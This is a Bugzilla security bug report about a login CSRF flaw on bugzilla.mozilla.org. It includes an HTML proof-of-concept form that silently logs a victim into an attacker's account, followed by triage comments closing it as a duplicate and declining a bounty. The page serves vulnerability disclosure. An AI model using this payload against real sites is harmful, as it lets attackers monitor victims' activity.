Closed
Bug 992094
Opened 10 years ago
Closed 10 years ago
csrf login in bugzilla
Categories
(bugzilla.mozilla.org :: General, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 713926
People
(Reporter: maradrianbelen, Unassigned)
References
Details
(Whiteboard: [site:bugzilla.mozilla.org][reporter-external])
User Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Steps to reproduce: Attacker creates a fake account make a csrf login like below then monitor actions performed by the victim or even interact with him poc <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://bugzilla.mozilla.org/index.cgi" method="POST"> <input type="hidden" name="Bugzilla_login" value="attacker_email" /> <input type="hidden" name="Bugzilla_password" value="password" /> <input type="hidden" name="Bugzilla_remember" value="on" /> <input type="hidden" name="GoAheadAndLogIn" value="Log in" /> <input type="submit" value="Submit form" /> </form> </body> </html> Actual results: can monitor the victim
duped bug 992095 which had this additional comment (In reply to mar adrian belen from comment #1) > https://hackerone.com/reports/547
Updated•10 years ago
|
Group: websites-security → bugzilla-security
Component: Other → General
Product: Websites → bugzilla.mozilla.org
Version: unspecified → Production
Updated•10 years ago
|
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?]
Updated•10 years ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Comment 4•10 years ago
|
||
This is a correct find. We do have a bug on file to fix this, bug 713926, and it actually looks like there was a patch submitted. Unfortunately that patch landed in Bugzilla v4.4.3 and up while Mozilla still runs an older Bugzilla 4.2.7.
Updated•10 years ago
|
Flags: sec-bounty?
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?] → [site:bugzilla.mozilla.org][reporter-external]
Updated•10 years ago
|
Flags: sec-bounty?
Comment 5•10 years ago
|
||
Sorry for the confusion by setting the bounty flag on this one. This bug has multiple dupes and those were rejected for bounties earlier: https://bugzilla.mozilla.org/show_bug.cgi?id=981186 https://bugzilla.mozilla.org/show_bug.cgi?id=966183 So I have removed the sec-bounty flag and the bug will not be triaged for bounty eligibility.
Updated•10 years ago
|
Flags: sec-bounty-
Updated•10 years ago
|
Group: bugzilla-security
You need to log in
before you can comment on or make changes to this bug.
Description
•